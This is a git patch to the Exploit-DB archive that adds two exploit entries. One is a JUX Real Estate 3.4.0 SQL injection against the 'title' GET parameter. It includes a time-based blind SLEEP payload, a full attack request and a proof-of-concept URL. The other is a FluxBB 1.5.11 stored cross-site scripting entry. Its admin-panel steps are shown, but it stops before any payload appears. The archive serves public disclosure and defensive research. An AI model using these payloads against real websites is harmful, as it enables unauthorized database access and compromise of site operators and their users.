From 40ceb13974b16530fb57143b3339701852ef7c63 Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Fri, 21 Mar 2025 00:16:35 +0000 Subject: [PATCH] DB: 2025-03-21 3 changes to exploits/shellcodes/ghdb FluxBB 1.5.11 - Stored Cross-Site Scripting (XSS) JUX Real Estate 3.4.0 - SQL Injection --- exploits/php/webapps/52089.txt | 44 ++++++++++++++++++++++++++++++++++ exploits/php/webapps/52090.txt | 18 ++++++++++++++ files_exploits.csv | 2 ++ 3 files changed, 64 insertions(+) create mode 100644 exploits/php/webapps/52089.txt create mode 100644 exploits/php/webapps/52090.txt diff --git a/exploits/php/webapps/52089.txt b/exploits/php/webapps/52089.txt new file mode 100644 index 000000000..f814c9710 --- /dev/null +++ b/exploits/php/webapps/52089.txt @@ -0,0 +1,44 @@ +# Exploit Title: JUX Real Estate 3.4.0 - SQL Injection +# Exploit Author: CraCkEr +# Date: 26/02/2025 +# Vendor: JoomlaUX +# Vendor Homepage: https://joomlaux.com/ +# Software Link: https://extensions.joomla.org/extension/jux-real-estate/ +# Demo Link: http://demo.joomlaux.com/#jux-real-estate +# Tested on: Windows 11 Pro +# Impact: Database Access +# CWE: CWE-89 - CWE-74 - CWE-707 +# CVE: CVE-2025-2126 +# VDB: VDB-299039 + + +## Description + +SQL injection attacks can allow unauthorized access to sensitive data, modification of +data and crash the application or make it unavailable, leading to lost revenue and +damage to a company's reputation. + + +Path: /extensions/realestate/index.php/properties/list/list-with-sidebar/realties + +GET Parameter 'title' is vulnerable to SQLi + + +--- +Parameter: title (GET) + Type: time-based blind + Title: MySQL >= 5.0.12 time-based blind (query SLEEP) + Payload: option=com_jux_real_estate&view=realties&Itemid=148&title='XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z&price_slider_lower=63752&price_slider_upper=400000&area_slider_lower=30&area_slider_upper=400&type_id=2&cat_id=8&country_id=73&locstate=187&beds=1&agent_id=112&baths=1&jp_yearbuilt=&button=Search + + +## POC: + +https://website/extensions/realestate/index.php/properties/list/list-with-sidebar/realties?option=com_jux_real_estate&view=realties&Itemid=148&title=[SQLi] + +## Payload: + +1'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z + + + +[-] Done \ No newline at end of file diff --git a/exploits/php/webapps/52090.txt b/exploits/php/webapps/52090.txt new file mode 100644 index 000000000..67d08d081 --- /dev/null +++ b/exploits/php/webapps/52090.txt @@ -0,0 +1,18 @@ +# Exploit Title: FluxBB 1.5.11 Stored xss +# Date: 3/8/2025 +# Exploit Author: Chokri Hammedi +# Vendor Homepage: www.fluxbb.org +# Software Link: https://www.softaculous.com/apps/forums/FluxBB +# Version: FluxBB 1.5.11 +# Tested on: Windows XP + + +1. login to admin panel +2. go to /admin_forums.php +3. click on "add forum" +4. in description text area put this payload: + +